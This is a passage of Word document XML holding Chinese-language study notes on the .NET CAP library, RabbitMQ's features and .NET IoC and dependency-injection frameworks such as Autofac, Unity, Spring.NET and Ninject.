          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>你以为这些就够了？不，远远不止：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="346"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CAP 同时支持 RabbitMQ，Kafka 等消息队列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="346"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CAP 同时支持 SQL Server, MySql, PostgreSql 等数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="346"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CAP Dashboard 同时支持中文和英文界面双语言，妈妈再也不用担心我看不懂了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="346"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CAP 提供了丰富的接口可以供扩展，什么序列化了，自定义处理了，自定义发送了统统不在话下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="346"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CAP 基于MIT开源，你可以尽管拿去做二次开发。（记得保留MIT的License）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这下你以为我说完了？ 不！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>你完全可以把 CAP 当做一个 EventBus 来使用，CAP具有优秀的消息处理能力，不要担心瓶颈会在CAP，那是永远不可能， 因为你随时可以在配置中指定CAP处理的消息使用的进程数， 只要你的数据库配置足够高...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>说了这么多，口干舌燥的，你不 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Star</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 一下给个精神上的支持说不过去吧？ ^_^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2号传送门： </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/dotnetcore/CAP" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://github.com/dotnetcore/CAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RabbitMQ特点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 是一个由 Erlang 语言开发的 AMQP 的开源实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ：Advanced Message Queue，高级消息队列协议。它是应用层协议的一个开放标准，为面向消息的中间件设计，基于此协议的客户端与消息中间件可传递消息，并不受产品、开发语言等条件的限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 最初起源于金融系统，用于在分布式系统中存储转发消息，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>易用性、扩展性、高可用性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>等方面表现不俗。具体特点包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可靠性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（Reliability）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 使用一些机制来保证可靠性，如持久化、传输确认、发布确认。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>灵活的路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（Flexible Routing）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>在消息进入队列之前，通过 Exchange 来路由消息的。对于典型的路由功能，RabbitMQ 已经提供了一些内置的 Exchange 来实现。针对更复杂的路由功能，可以将多个 Exchange 绑定在一起，也通过插件机制实现自己的 Exchange 。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>消息集群</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（Clustering）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>多个 RabbitMQ 服务器可以组成一个集群，形成一个逻辑 Broker 。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>高可用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（Highly Available Queues）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>队列可以在集群中的机器上进行镜像，使得在部分节点出问题的情况下队列仍然可用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>多种协议（Multi-protocol）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 支持多种消息队列协议，比如 STOMP、MQTT 等等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>多语言客户端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（Many Clients）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 几乎支持所有常用语言，比如 Java、.NET、Ruby 等等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>管理界面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（Management UI）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 提供了一个易用的用户界面，使得用户可以监控和管理消息 Broker 的许多方面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>跟踪机制（Tracing）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>如果消息异常，RabbitMQ 提供了消息跟踪机制，使用者可以找出发生了什么。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>插件机制（Plugin System）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>RabbitMQ 提供了许多插件，来从多方面进行扩展，也可以编写自己的插件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>https://www.jianshu.com/p/79ca08116d57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>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依赖倒置框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于面向对象6大原则之 - 依赖倒置原则DIP - 工厂模式实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IOC - inversion of control 控制反转，调用者不再创建被调用者的实例，由框架(容器)创建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DL - Dependency Lookup 依赖查找，容器提供回调接口和上下文环境给组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DI - Dependency Injection 依赖注入，容器创建好实例后再注入调用者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Autofac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最为流行的IOC框架之一，轻量且高性能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Unity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最为流行的IOC框架之一，微软出品</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring.NET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以Java版的Spring框架为基础，提供了多种功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ninject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个轻量级的注入框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>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任务调度</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
